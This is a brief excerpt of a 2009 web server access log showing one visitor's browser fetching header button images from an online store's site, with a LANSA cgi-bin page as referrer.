201.160.249.77 - - [06/Jul/2009:02:15:13 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:15:13 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:15:13 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
